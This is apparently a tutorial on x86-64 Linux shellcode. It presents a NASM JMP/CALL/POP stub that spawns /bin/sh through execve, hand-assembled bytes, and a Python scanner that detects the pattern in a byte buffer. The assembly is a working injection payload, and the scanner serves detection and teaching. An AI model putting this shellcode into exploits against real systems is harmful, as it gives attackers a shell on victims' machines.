Shellcode 1 -> execve(/bin/sh) JMP CALL POP

  1. We will use the JMP CALL POP technique to find the address of /bin/sh and make RDI point to it.

  2. Add a null byte after it, so the string is NUL-terminated.

  3. RDX needs to point to a place holding 8 bytes of 0 (the empty envp).

  4. RSI needs to point to 8 bytes holding the address of /bin/sh, followed by 8 bytes of 0 (argv = {"/bin/sh", NULL}).

Shellcode becomes:

```nasm
global _start

section .text

_start:
	; Jump forward, then call backward: the call pushes the address of the
	; string that follows it, which the pop below retrieves.
	jmp find_address

shellcode:
	xor rax, rax

	; Get the address of the string (pushed by the call)
	pop rdi

	; Convert the A -> 0x0 to null-terminate the string (ah is 0 because rax is 0)
	mov byte [rdi+7], ah

	; Copy the address of the string in RDI to BBBBBBBB (argv[0])
	mov [rdi+8], rdi

	; Copy the NULL 0x0000000000000000 -> CCCCCCCC (argv[1] / envp[0])
	mov [rdi+16], rax

	; Setup the addresses: rsi = argv, rdx = envp
	lea rsi, [rdi+8]
	lea rdx, [rdi+16]

	; execve is syscall 59 on x86-64; rax is 0, so add gives 59 without a null byte
	add rax, 59
	syscall

find_address:
	call shellcode

	; "/bin/sh" (7 bytes), A -> terminator, B -> argv[0] slot, C -> NULL slot
shell_path_string:	db	"/bin/shABBBBBBBBCCCCCCCC"
```
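To show how the stub hangs together from the other side, here is an added example (not code from the original page): a small Python scanner that looks for the JMP / CALL / POP pattern in a byte buffer and recovers the data the CALL leaves behind. The short forward JMP, the backward CALL whose return address is the start of the embedded string, and the POP that collects that address form a distinctive signature a defender can check for when triaging a suspicious blob. The sample bytes are hand-assembled from the listing above using the offsets worked out in the comments; that encoding is an assumption of this example, not output taken from the page. The scanner is more general than the listing: it accepts any `pop` register (including `r8`-`r15`) and finds the stub anywhere in the buffer.

```python
import struct

# Constructed sample: hand-assembled bytes of the stub above (assumption: NASM emits
# these short encodings). Offsets: jmp at 0 -> call at 31 (rel8 = +29);
# call at 31 -> xor rax, rax at 2 (rel32 = -34); string data at 36.
SAMPLE_STUB = bytes.fromhex(
    "eb1d"          # jmp short find_address
    "4831c0"        # xor rax, rax
    "5f"            # pop rdi
    "886707"        # mov byte [rdi+7], ah
    "48897f08"      # mov [rdi+8], rdi
    "48894710"      # mov [rdi+16], rax
    "488d7708"      # lea rsi, [rdi+8]
    "488d5710"      # lea rdx, [rdi+16]
    "4883c03b"      # add rax, 59
    "0f05"          # syscall
    "e8deffffff"    # call shellcode (rel32 = -34)
) + b"/bin/shABBBBBBBBCCCCCCCC"

POP_REGS = ["rax", "rcx", "rdx", "rbx", "rsp", "rbp", "rsi", "rdi"]
PRINTABLE = set(range(0x20, 0x7F))


def contains_null(blob):
    """True if the buffer has a 0x00 byte (a null-free stub is the usual goal)."""
    return 0 in blob


def find_jmp_call_pop(blob, pop_window=8, preview_len=32):
    """Return one record per JMP/CALL/POP stub found in blob.

    Pattern: EB rel8 (forward) -> E8 rel32 (backward, landing between the jmp and
    the call) -> a pop within pop_window bytes of the call target. The bytes right
    after the call are the data whose address the pop recovers.
    """
    hits = []
    n = len(blob)
    for i in range(n - 1):
        if blob[i] != 0xEB:
            continue
        rel8 = struct.unpack("<b", blob[i + 1:i + 2])[0]
        call_at = i + 2 + rel8
        if rel8 <= 0 or call_at + 5 > n or blob[call_at] != 0xE8:
            continue
        rel32 = struct.unpack("<i", blob[call_at + 1:call_at + 5])[0]
        call_dest = call_at + 5 + rel32
        if not (i < call_dest < call_at):  # the call must land back inside the stub
            continue
        pop_reg = None
        for k in range(call_dest, min(call_dest + pop_window, call_at)):
            b = blob[k]
            if 0x58 <= b <= 0x5F:                      # pop rax..rdi
                pop_reg = POP_REGS[b - 0x58]
                break
            if b == 0x41 and k + 1 < call_at and 0x58 <= blob[k + 1] <= 0x5F:
                pop_reg = "r%d" % (8 + blob[k + 1] - 0x58)  # REX.B: pop r8..r15
                break
        if pop_reg is None:
            continue
        data_at = call_at + 5
        preview = bytearray()
        for b in blob[data_at:data_at + preview_len]:  # printable prefix of the data
            if b not in PRINTABLE:
                break
            preview.append(b)
        hits.append({
            "jmp_offset": i,
            "call_offset": call_at,
            "code_offset": call_dest,
            "pop_register": pop_reg,
            "data_offset": data_at,
            "data_preview": preview.decode("ascii"),
        })
    return hits


if __name__ == "__main__":
    print("null bytes present:", contains_null(SAMPLE_STUB))
    for hit in find_jmp_call_pop(SAMPLE_STUB):
        print(hit)
```

Running the block prints one hit with `pop_register` `rdi` and `data_preview` `/bin/shABBBBBBBBCCCCCCCC` at offset 36, which is exactly the address the `pop rdi` receives; the `A`/`B`/`C` filler is visible because the zeroing and pointer stores only happen at run time.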

Note: this may give an error when tested as a stand-alone binary, because the bytes are defined in the .text section, which is not writable by default, so the stores into the string fault. In that case we have to ensure that our shellcode can edit the defined bytes in the text section. If that is not possible, an alternative is to place a null byte directly after /bin/sh in the defined bytes, find another way to make RSI point to the address of /bin/sh followed by 8 bytes of 0s, and load RDX from RAX, which is already 0.
